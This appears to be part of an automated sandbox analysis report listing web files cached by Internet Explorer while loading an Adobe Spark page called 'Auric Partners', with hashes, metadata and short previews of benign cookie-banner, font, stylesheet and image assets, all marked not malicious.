                                                                                                                                                                                                                                                        Preview: . {. "name": "otFlat",. "html": "PGRpdiBpZD0ib25ldHJ1c3QtYmFubmVyLXNkayIgY2xhc3M9Im90RmxhdCIgcm9sZT0iZGlhbG9nIiBhcmlhLWxhYmVsbGVkYnk9Im9uZXRydXN0LXBvbGljeS10aXRsZSIgYXJpYS1kZXNjcmliZWRieT0ib25ldHJ1c3QtcG9saWN5LXRleHQiPjxkaXYgY2xhc3M9Im90LXNkay1jb250YWluZXIiPjxkaXYgY2xhc3M9Im90LXNkay1yb3ciPjxkaXYgaWQ9Im9uZXRydXN0LWdyb3VwLWNvbnRhaW5lciIgY2xhc3M9Im90LXNkay1laWdodCBvdC1zZGstY29sdW1ucyI+PGRpdiBjbGFzcz0iYmFubmVyX2xvZ28iPjwvZGl2PjxkaXYgaWQ9Im9uZXRydXN0LXBvbGljeSI+PGgzIGlkPSJvbmV0cnVzdC1wb2xpY3ktdGl0bGUiPlRoaXMgc2l0ZSB1c2VzIGNvb2tpZXM8L2gzPjwhLS0gTW9iaWxlIENsb3NlIEJ1dHRvbiAtLT48ZGl2IGlkPSJvbmV0cnVzdC1jbG9zZS1idG4tY29udGFpbmVyLW1vYmlsZSIgY2xhc3M9Im90LWhpZGUtbGFyZ2UiPjxidXR0b24gY2xhc3M9Im9uZXRydXN0LWNsb3NlLWJ0bi1oYW5kbGVyIG9uZXRydXN0LWNsb3NlLWJ0bi11aSBiYW5uZXItY2xvc2UtYnV0dG9uIG90LW1vYmlsZSBvdC1jbG9zZS1pY29uIiBhcmlhLWxhYmVsPSJDbG9zZSBCYW5uZXIiIHRhYmluZGV4PSIwIj48L2J1dHRvbj48L2Rpdj48IS0tIE1vYmlsZSBDbG9zZSBCdXR0b24gRU5ELS0+PHAgaWQ9Im9uZXRydXN0LXBvbGljeS10ZX
                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PSUEOSZZ\otPcCenter[1].json
                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                                                        File Type:ASCII text, with very long lines
                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                        Size (bytes):63191
                                                                                                                                                                                                                                                        Entropy (8bit):5.7281852320659645
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:768:e6KTptKiyT9hHZn4qG+ZlzxNsmWuPZ9gHAcfhoK:e6KTptKNHZRGUdxvW+oHAcf3
                                                                                                                                                                                                                                                        MD5:23DEFBEB3F5340E980CFC9203E6D6806
                                                                                                                                                                                                                                                        SHA1:B57B6950AC0834D7507E9F7484B9F05F9E85B012
                                                                                                                                                                                                                                                        SHA-256:84E13B47921EE79D3FAB38B733E08DC04CA99B25C1880CB25475C9315DDC2146
                                                                                                                                                                                                                                                        SHA-512:11C3484683B5EEEA6A111B51A76C520FB5552A8414D1E9128B3D3E1A0BB7AEC0C9F78B7E7338F1C7BD007283C212BA4D453C2871260259E50192FA01EE944621
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        IE Cache URL:https://cdn.cookielaw.org/scripttemplates/6.9.0/assets/otPcCenter.json
                                                                                                                                                                                                                                                        Preview: . {. "name": "otPcCenter",. "html": "PGRpdiBpZD0ib25ldHJ1c3QtcGMtc2RrIiBjbGFzcz0ib3Qtc2RrLWNvbnRhaW5lciBvdFBjQ2VudGVyIG90LWhpZGUgb3QtZmFkZS1pbiBvdC1hY2NvcmRpb25zLXBjIiBhcmlhLW1vZGFsPSJ0cnVlIiByb2xlPSJkaWFsb2ciIGFyaWEtbGFiZWxsZWRieT0icGMtdGl0bGUiPjwhLS0gQ2xvc2UgQnV0dG9uIC0tPiA8YnV0dG9uIGlkPSJjbG9zZS1wYy1idG4taGFuZGxlciIgY2xhc3M9Im1haW4gcGMtY2xvc2UtYnV0dG9uIG90LWNsb3NlLWljb24iIGFyaWEtbGFiZWw9IkNsb3NlIj48L2J1dHRvbj48IS0tIENsb3NlIEJ1dHRvbiAtLT48ZGl2IGlkPSJvdC1jb250ZW50IiBjbGFzcz0ib3QtbWFpbi1jb250ZW50Ij48IS0tIExvZ28gVGFnIC0tPjxkaXYgY2xhc3M9InBjLWxvZ28tY29udGFpbmVyIj48ZGl2IGNsYXNzPSJwYy1sb2dvIiByb2xlPSJpbWciIGFyaWEtbGFiZWw9IkNvbXBhbnkgTG9nbyI+PC9kaXY+PC9kaXY+PGgzIGlkPSJwYy10aXRsZSI+WW91ciBQcml2YWN5PC9oMz48ZGl2IGlkPSJwYy1wb2xpY3ktdGV4dCI+PC9kaXY+PGRpdiBpZD0iYWNjZXB0LXJlY29tbWVuZGVkLWNvbnRhaW5lciIgY2xhc3M9Im90LXNkay1yb3ciPjxkaXYgY2xhc3M9Im90LXNkay1jb2x1bW4iPjxidXR0b24gaWQ9ImFjY2VwdC1yZWNvbW1lbmRlZC1idG4taGFuZGxlciIgY2xhc3M9ImJ1dHRvbi10aGVtZSI+QWNjZXB0IH
                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PSUEOSZZ\pps7abe[1].css
                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                                                        File Type:UTF-8 Unicode text, with very long lines
                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                        Size (bytes):5912
                                                                                                                                                                                                                                                        Entropy (8bit):5.2044956005117
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:96:pbzQ2hl0RMFRioMWznrvMmMoZS6MaJ6QMbxkbMy9cRMxRqkM8c:pjl0RMFRioMWznrvMmMoZS6MaJ6QMbx9
                                                                                                                                                                                                                                                        MD5:6FEB771900764877F9ED7FCCCC9428B5
                                                                                                                                                                                                                                                        SHA1:31693DA6584BC9FAB601AFC35550AEEE6A8210C1
                                                                                                                                                                                                                                                        SHA-256:3AC4CEB0885F766CF6E170BA7191315EA1C54287BF0947095E85D1B090A1BC35
                                                                                                                                                                                                                                                        SHA-512:890E633998C812A19B63947F922815E14632328A9522AEBF5AFDA87D947684130C643EA48BF21124564F4DC17936DDC0F9F3907BA61594D197A797E5160B145E
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        IE Cache URL:https://use.typekit.net/pps7abe.css
                                                                                                                                                                                                                                                        Preview: /*. * The Typekit service used to deliver this font or fonts for use on websites. * is provided by Adobe and is subject to these Terms of Use. * http://www.adobe.com/products/eulas/tou_typekit. For font license. * information, see the list below.. *. * adobe-clean:. * - http://typekit.com/eulas/00000000000000003b9b3f85. * - http://typekit.com/eulas/00000000000000003b9b3f86. * - http://typekit.com/eulas/00000000000000003b9b3f88. * - http://typekit.com/eulas/00000000000000003b9b3f83. * - http://typekit.com/eulas/00000000000000003b9b3f8c. * - http://typekit.com/eulas/00000000000000003b9b3f84. * adobe-clean-serif:. * - http://typekit.com/eulas/00000000000000003b9aee45. * - http://typekit.com/eulas/00000000000000003b9aee47. *. * . 2009-2021 Adobe Systems Incorporated. All Rights Reserved.. */./*{"last_published":"2020-01-31 14:53:09 UTC"}*/..@font-face {.font-family:"adobe-clean";.src:url("https://use.typekit.net/af/b0c5f5/00000000000000003b9b3f85/27/l?primer=388f68b35a7cbf
                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PSUEOSZZ\publish.combined.fp-f5ca45e4601bf2640f1c068ba7d0d0c6[1].css
                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                                                        File Type:ASCII text, with very long lines
                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                        Size (bytes):652760
                                                                                                                                                                                                                                                        Entropy (8bit):5.2715177296770355
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:6144:Gyohs3/eUZPvp2nrz3eLxtQtD3anxcQIVO:7/eUZPvp2nrz3eLxtQtD3an1IVO
                                                                                                                                                                                                                                                        MD5:F5CA45E4601BF2640F1C068BA7D0D0C6
                                                                                                                                                                                                                                                        SHA1:D0CADA6ACAA8B3F54BA6EA12B44A492B2B038874
                                                                                                                                                                                                                                                        SHA-256:C03F4D8703613618774ABAF6E7BE5E9281BEC836C574701A7019B0C24D56444C
                                                                                                                                                                                                                                                        SHA-512:1816D46F152F6377666D1ACE3E45B613CE6F2F494312A6F56B39E9442D93110FB2AC18723F1F97C937D83B3BE42645DA336D936F5D8D43B4DD3BFAC0DD59B9B6
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        IE Cache URL:https://www.adobe.com/etc.hawks.dexterlibs/hawks/clientlibs/publish.combined.fp-f5ca45e4601bf2640f1c068ba7d0d0c6.css
                                                                                                                                                                                                                                                        Preview: /* The OOTB AEM 6.4 grid system.. *. * This has been modified slightly to support Dexter's. * custom breakpoints and remove fixed left / right padding.. */./*. * ADOBE CONFIDENTIAL. *. * Copyright 2015 Adobe Systems Incorporated. * All Rights Reserved.. *. * NOTICE: All information contained herein is, and remains. * the property of Adobe Systems Incorporated and its suppliers,. * if any. The intellectual and technical concepts contained. * herein are proprietary to Adobe Systems Incorporated and its. * suppliers and may be covered by U.S. and Foreign Patents,. * patents in process, and are protected by trade secret or copyright law.. * Dissemination of this information or reproduction of this material. * is strictly forbidden unless prior written permission is obtained. * from Adobe Systems Incorporated.. */./* grid component */..aem-Grid {. display: block;. width: 100%;.}..aem-Grid::before,..aem-Grid::after {. display: table;. content: " ";.}..aem-Grid::after {. clear: both;.}
                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PSUEOSZZ\scripts[1].js
                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                                                        File Type:UTF-8 Unicode text
                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                        Size (bytes):36587
                                                                                                                                                                                                                                                        Entropy (8bit):5.031973795792918
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:384:U1qVZSpe137a6wbqWcqS5G399ah4qAUaww3boPONH7uh3fDntOX4jQt41gvUxUPU:UMZPjw/u/P0NHyBJa4j/b6g
                                                                                                                                                                                                                                                        MD5:B17288A1E30B569809A86C18E9BB2175
                                                                                                                                                                                                                                                        SHA1:C04F72BE58D7D8473718CBF00C7BBDF8E1321519
                                                                                                                                                                                                                                                        SHA-256:54F6DE9BE24813BE1C6F8CC2E86D7587E4E4EB6D19A17176B0AC733790145F42
                                                                                                                                                                                                                                                        SHA-512:3FEF9E8D01643A802FBDDF93A19F36B26254C393384F8B41A7DA0397826AAE2F2446D837B7A952197061FC5440CF1FC8CBF0483D601ED19BFBCA25F8F54EEAA6
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        IE Cache URL:https://www.adobe.com/express/scripts/scripts.js
                                                                                                                                                                                                                                                        Preview: /*. * Copyright 2021 Adobe. All rights reserved.. * This file is licensed to you under the Apache License, Version 2.0 (the "License");. * you may not use this file except in compliance with the License. You may obtain a copy. * of the License at http://www.apache.org/licenses/LICENSE-2.0. *. * Unless required by applicable law or agreed to in writing, software distributed under. * the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR REPRESENTATIONS. * OF ANY KIND, either express or implied. See the License for the specific language. * governing permissions and limitations under the License.. */./* global window, navigator, document, fetch, performance, PerformanceObserver,. FontFace, sessionStorage, Image */./* eslint-disable no-console */..export function toClassName(name) {. return name && typeof name === 'string'. ? name.toLowerCase().replace(/[^0-9a-z]/gi, '-'). : '';.}..export function createTag(name, attrs) {. const el = document.createElement(n
                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PSUEOSZZ\spark[1].svg
                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                                                        File Type:SVG Scalable Vector Graphics image
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):3245
                                                                                                                                                                                                                                                        Entropy (8bit):5.201590437010129
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:96:EOjZfymEL6GBGTGGcnxv1U9KByhSl+x4rvdk6:Hj1yR6GBh1ChSQSLy6
                                                                                                                                                                                                                                                        MD5:907B6C4171506C79784218007A40BA44
                                                                                                                                                                                                                                                        SHA1:439E9CAF7CDC5B93A3CA412EC4EDA6338997644A
                                                                                                                                                                                                                                                        SHA-256:AC0A282DCE35E91B761D9E69142973C44CD495E468434DCF1AD249F498D00788
                                                                                                                                                                                                                                                        SHA-512:BD968C37D67A94827BF555E5A013A45CECB0DEC045815B00091FC8BF4B9F0F32064F9ED8395D3D7A625BD287D462EA271834E65D9886EA436029045DEEEC0A44
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Preview: <?xml version="1.0" encoding="utf-8"?>. Generator: Adobe Illustrator 23.0.1, SVG Export Plug-In . SVG Version: 6.00 Build 0) -->.<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd" [..<!ENTITY ns_extend "http://ns.adobe.com/Extensibility/1.0/">..<!ENTITY ns_ai "http://ns.adobe.com/AdobeIllustrator/10.0/">..<!ENTITY ns_graphs "http://ns.adobe.com/Graphs/1.0/">..<!ENTITY ns_vars "http://ns.adobe.com/Variables/1.0/">..<!ENTITY ns_imrep "http://ns.adobe.com/ImageReplacement/1.0/">..<!ENTITY ns_sfw "http://ns.adobe.com/SaveForWeb/1.0/">..<!ENTITY ns_custom "http://ns.adobe.com/GenericCustomNamespace/1.0/">..<!ENTITY ns_adobe_xpath "http://ns.adobe.com/XPath/1.0/">.]>.<svg version="1.1" id="Livello_1" xmlns:x="&ns_extend;" xmlns:i="&ns_ai;" xmlns:graph="&ns_graphs;".. xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" x="0px" y="0px" viewBox="0 0 240 234".. style="enable-background:new 0 0 240 234;" xml:space="pres
                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PSUEOSZZ\themetwo.fp-abc573155522bcda0452e193dff7aa91[1].css
                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                                                        File Type:ASCII text, with very long lines, with no line terminators
                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                        Size (bytes):301880
                                                                                                                                                                                                                                                        Entropy (8bit):4.99900233389085
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:384:LreqQVUz4G0X5AgD6zicPvT67qm032cRHO9y/SbOD6mCroWKa8E8UoGofHo+zwci:OzW6xPcgy/N6FroFrf+Lq7TnuWy19
                                                                                                                                                                                                                                                        MD5:ABC573155522BCDA0452E193DFF7AA91
                                                                                                                                                                                                                                                        SHA1:EDB2799FBA37BF41FE9C2DC898D4C0650A10DB14
                                                                                                                                                                                                                                                        SHA-256:8602171F79058FCB3DBFA67B3DC823C3C49838E89A7D195FE9B1D7D350ABD6F7
                                                                                                                                                                                                                                                        SHA-512:1A265935DE18CE88EB0F281C284264F530F7ACDDBABF4FC53E1DD4A1D0FC41660F68450E3B5D89DEF2B4EC56D4671695B2960C99AAB89D3F297541229AF29F5D
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        IE Cache URL:https://www.adobe.com/etc.hawks.dexterlibs/dexter/clientlibs/base/themetwo.fp-abc573155522bcda0452e193dff7aa91.css
                                                                                                                                                                                                                                                        Preview: .spectrum-Icon{display:inline-block;color:inherit;fill:currentColor}.spectrum-Icon.is-animated{transition:color .15s ease-in-out,fill .15s ease-in-out}.spectrum-Icon--sizeXXS,.spectrum-Icon--sizeXXS img,.spectrum-Icon--sizeXXS svg{height:.5625rem;width:.5625rem}.spectrum-Icon--sizeXS,.spectrum-Icon--sizeXS img,.spectrum-Icon--sizeXS svg{height:.75rem;width:.75rem}.spectrum-Icon--sizeS,.spectrum-Icon--sizeS img,.spectrum-Icon--sizeS svg{height:1.125rem;width:1.125rem}.spectrum-Icon--sizeM,.spectrum-Icon--sizeM img,.spectrum-Icon--sizeM svg{height:1.5rem;width:1.5rem}.spectrum-Icon--sizeL,.spectrum-Icon--sizeL img,.spectrum-Icon--sizeL svg{height:2.25rem;width:2.25rem}.spectrum-Icon--sizeXL,.spectrum-Icon--sizeXL img,.spectrum-Icon--sizeXL svg{height:3rem;width:3rem}.spectrum-Icon--sizeXXL,.spectrum-Icon--sizeXXL img,.spectrum-Icon--sizeXXL svg{height:4.5rem;width:4.5rem}.spectrum-Icon,.spectrum-UIIcon{display:inline-block;color:inherit;fill:currentColor;pointer-events:none}.spectrum-Ico
                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PSUEOSZZ\vtg4qoo[1].js
                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                                                        File Type:UTF-8 Unicode text, with very long lines
                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                        Size (bytes):18975
                                                                                                                                                                                                                                                        Entropy (8bit):5.588875152231931
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:384:bTz4QhLGD8h2tpIgIPs51iRm2lIew42noFeFsP9btiCtpIaCR:vz4QhLA8zq1iRm2XwMqsbbt6J
                                                                                                                                                                                                                                                        MD5:46700293FD68A3707BEAF54E63C4D9A8
                                                                                                                                                                                                                                                        SHA1:5F1130A35AC5C767DF52A13CC14D412B0A1CC0E9
                                                                                                                                                                                                                                                        SHA-256:413B5751660E454D49C8430CBD09054C97E7B0560660B14892FF6048E4CDDE46
                                                                                                                                                                                                                                                        SHA-512:FE06C4159C0968AA5DCB63DEEF234973D8B9F66C54DFCC350FA840072D5DE40F691C05844A5DA4A682F0D2ED2E5FCB90318DCAE981C7A532D2BD9A1FE5887889
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        IE Cache URL:https://use.typekit.net/vtg4qoo.js
                                                                                                                                                                                                                                                        Preview: /*. * The Typekit service used to deliver this font or fonts for use on websites. * is provided by Adobe and is subject to these Terms of Use. * http://www.adobe.com/products/eulas/tou_typekit. For font license. * information, see the list below.. *. * adobe-clean:. * - http://typekit.com/eulas/000000000000000000017701. * - http://typekit.com/eulas/000000000000000000017703. * - http://typekit.com/eulas/0000000000000000000176ff. * - http://typekit.com/eulas/000000000000000000017706. * brandon-grotesque:. * - http://typekit.com/eulas/0000000000000000000132df. * - http://typekit.com/eulas/0000000000000000000132e3. * - http://typekit.com/eulas/0000000000000000000132e1. *. * . 2009-2021 Adobe Systems Incorporated. All Rights Reserved.. */.if(!window.Typekit)window.Typekit={};window.Typekit.config={"a":"1655249","c":[".tk-adobe-clean","\"adobe-clean\",sans-serif",".tk-brandon-grotesque","\"brandon-grotesque\",sans-serif"],"fi":[7180,7182,7184,22474,10294,10296,10302],"fc":[{"i
                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\Cookies_72px_lt-gray[1].svg
                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                                                        File Type:SVG Scalable Vector Graphics image
                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                        Size (bytes):29593
                                                                                                                                                                                                                                                        Entropy (8bit):6.132885465655844
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:768:37Mv1nW4/4c6v1Nn8Zh8xMYS8k2eBP2y0Ejn1:Av1n1Q/48xK2mjx
                                                                                                                                                                                                                                                        MD5:DC2C21E75D20CE5B00C78499D3B2DEAD
                                                                                                                                                                                                                                                        SHA1:4D507BBB930FA9BDCE35371538B3C6A74549C503
                                                                                                                                                                                                                                                        SHA-256:2076A1B099924D72F8B2D636645C5598444CEF873335E9D400CC7C8285CC96A1
                                                                                                                                                                                                                                                        SHA-512:E4644CDCB754C783185642E029E7FE6617134C9E2DBB2F95B8ED4E6B3DF5828A47BF7E0CD3A709EF07379C27522F1AFD666FF8333846F9942A4572E0355D9B5E
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        IE Cache URL:https://www.adobe.com/content/dam/cc1/en/privacy/images/Cookies_72px_lt-gray.svg
                                                                                                                                                                                                                                                        Preview: <?xml version="1.0" encoding="utf-8"?>. Generator: Adobe Illustrator 19.2.0, SVG Export Plug-In . SVG Version: 6.00 Build 0) -->.<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd" [..<!ENTITY ns_extend "http://ns.adobe.com/Extensibility/1.0/">..<!ENTITY ns_ai "http://ns.adobe.com/AdobeIllustrator/10.0/">..<!ENTITY ns_graphs "http://ns.adobe.com/Graphs/1.0/">..<!ENTITY ns_vars "http://ns.adobe.com/Variables/1.0/">..<!ENTITY ns_imrep "http://ns.adobe.com/ImageReplacement/1.0/">..<!ENTITY ns_sfw "http://ns.adobe.com/SaveForWeb/1.0/">..<!ENTITY ns_custom "http://ns.adobe.com/GenericCustomNamespace/1.0/">..<!ENTITY ns_adobe_xpath "http://ns.adobe.com/XPath/1.0/">.]>.<svg version="1.1" id="adobeNews_x5F_72_x5F_lt-ou" xmlns:x="&ns_extend;" xmlns:i="&ns_ai;" xmlns:graph="&ns_graphs;".. xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" x="0px" y="0px" width="72px" height="72px".. viewBox="-359 271 72 72" style="enab
                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\GG8mUEsjQvSUh[1].htm
                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                                                        File Type:HTML document, ASCII text, with very long lines
                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                        Size (bytes):52203
                                                                                                                                                                                                                                                        Entropy (8bit):5.20614071782965
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:768:8n8+27e5FyW7F1FnWO8JARtEeqakKnMrb:8nT224W7zhWO8JCnMf
                                                                                                                                                                                                                                                        MD5:02DF9DD00895D7E0017A343FCD94B7A7
                                                                                                                                                                                                                                                        SHA1:982E84D3E85CCDEAB0C881FB9B5CDCEF3D676B95
                                                                                                                                                                                                                                                        SHA-256:B49AD6B8BA2A9617DD8F02411CE66B6579D95DDA2F8D625B946EE679EAB3DCE0
                                                                                                                                                                                                                                                        SHA-512:AE52F0F90DDC9262A3DA0553E63256A66657C363FE3AD760809AEFA80BE3A278169A3BF936E9870029525ED62627EA920CFB5A1C3EA9AB3264C5F259BE1BBC96
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        IE Cache URL:https://spark.adobe.com/page/GG8mUEsjQvSUh/
                                                                                                                                                                                                                                                        Preview: <!DOCTYPE html>.<html>.<head>. <meta charset="utf-8">. <title>Auric Partners</title>. <meta content="yes" name="apple-touch-fullscreen" />. <meta content="yes" name="apple-mobile-web-app-capable" />. <meta content="black-translucent" name="apple-mobile-web-app-status-bar-style" />. <meta content="width=device-width, initial-scale=1, maximum-scale=1" name="viewport" />.. <meta name="robots" content="noindex">.. <meta property="og:title" content="Auric Partners">. <meta property="og:type" content="website">. <meta property="og:image" content="https://spark.adobe.com/page/GG8mUEsjQvSUh/embed.jpg?buster=1623333594506">. <meta property="og:image:width" content="1024">. <meta property="og:image:height" content="512">. <meta property="og:site_name" content="Adobe Spark">. <meta property="og:description" content="A story told with Adobe Spark">.. <meta name="twitter:card" content="summary_large_image">. <meta name="twitter:title" content="Auric P
                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\Policies_72px_lt-gray[1].svg
                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                                                        File Type:SVG Scalable Vector Graphics image
                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                        Size (bytes):28449
                                                                                                                                                                                                                                                        Entropy (8bit):6.1296006799069325
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:768:37Y73fMwXqXlPGT4Ch21JSP39z6dHuUN+3nw:k73fMwsPGT81cwuUow
                                                                                                                                                                                                                                                        MD5:EFB6F897542A02F53A3859AAEFBD7013
                                                                                                                                                                                                                                                        SHA1:1CABA3B56B5AB14798C12C84C565AFE2A28DC2DD
                                                                                                                                                                                                                                                        SHA-256:B0AE115BC1ED8A5D8D3FE58E43A43AB6B54ADC35555D38A09BB44B22A0617A78
                                                                                                                                                                                                                                                        SHA-512:AC718B0FF41B2B34F38273E9EF7B3CD93AF51B4A3BD635F48E8D8E1F85A64AC9723E2F4AA69EC2062A152A2DC8940DC967ECA93E46DCFFD33C3B5766DB8BE05F
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        IE Cache URL:https://www.adobe.com/content/dam/cc1/en/privacy/images/Policies_72px_lt-gray.svg
                                                                                                                                                                                                                                                        Preview: <?xml version="1.0" encoding="utf-8"?>. Generator: Adobe Illustrator 19.2.0, SVG Export Plug-In . SVG Version: 6.00 Build 0) -->.<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd" [..<!ENTITY ns_extend "http://ns.adobe.com/Extensibility/1.0/">..<!ENTITY ns_ai "http://ns.adobe.com/AdobeIllustrator/10.0/">..<!ENTITY ns_graphs "http://ns.adobe.com/Graphs/1.0/">..<!ENTITY ns_vars "http://ns.adobe.com/Variables/1.0/">..<!ENTITY ns_imrep "http://ns.adobe.com/ImageReplacement/1.0/">..<!ENTITY ns_sfw "http://ns.adobe.com/SaveForWeb/1.0/">..<!ENTITY ns_custom "http://ns.adobe.com/GenericCustomNamespace/1.0/">..<!ENTITY ns_adobe_xpath "http://ns.adobe.com/XPath/1.0/">.]>.<svg version="1.1" id="adobeNews_x5F_72_x5F_lt-ou" xmlns:x="&ns_extend;" xmlns:i="&ns_ai;" xmlns:graph="&ns_graphs;".. xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" x="0px" y="0px" width="72px" height="72px".. viewBox="-359 271 72 72" style="enab
                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\Privacy-Image-2-1440x340.jpg.img[1].jpg
                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                                                        File Type:JPEG image data, baseline, precision 8, 445x300, frames 3
                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                        Size (bytes):28243
                                                                                                                                                                                                                                                        Entropy (8bit):7.617174108691038
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:768:JBYyi06jKtH4Vb7G77cv5eg9ZNjueEEF3y:JBm0wUYVm77m96j0y
                                                                                                                                                                                                                                                        MD5:5AC5CC8B77615A24CB4A981921EB751D
                                                                                                                                                                                                                                                        SHA1:AEB7E76ABEE2DB25192833AC34A50D2C2A9C75B7
                                                                                                                                                                                                                                                        SHA-256:459A34EDCD31C4D24A58F9D8C5E36F092D5AA3A62B70F8012A2DB7C2B5FDD5B0
                                                                                                                                                                                                                                                        SHA-512:2833A7C0B4E7B957FDC2410BC8101D7E534E2C7FDEB42398B908419F21B1582F4E8F63590587331F485472AFAE82F30423B37263C5699E3D65009388717D7FD5
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        IE Cache URL:https://www.adobe.com/content/dam/cc1/en/privacy/images/Privacy-Image-2-1440x340.jpg.img.jpg
                                                                                                                                                                                                                                                        Preview: ......http://ns.adobe.com/xap/1.0/.<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c128 79.159141, 2016/03/22-01:13:27 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:715ed33e-e62b-4e66-bb93-54d394e3b830" stRef:documentID="adobe:docid:photoshop:9561acbc-4e88-1179-af16-f6a1d25c9bdd" stRef:originalDocumentID="xmp.did:abae1003-6656-4926-aeda-82e235185e72"/> </rdf:Description> </rdf:RDF> </x:xmpmeta>
                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\RC6f46e43fa6d44dbeb45cc5801ffded0e-file.min[1].js
                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                                                        File Type:ASCII text, with very long lines
                                                                                                                                                                                                                                                        Category:downloaded
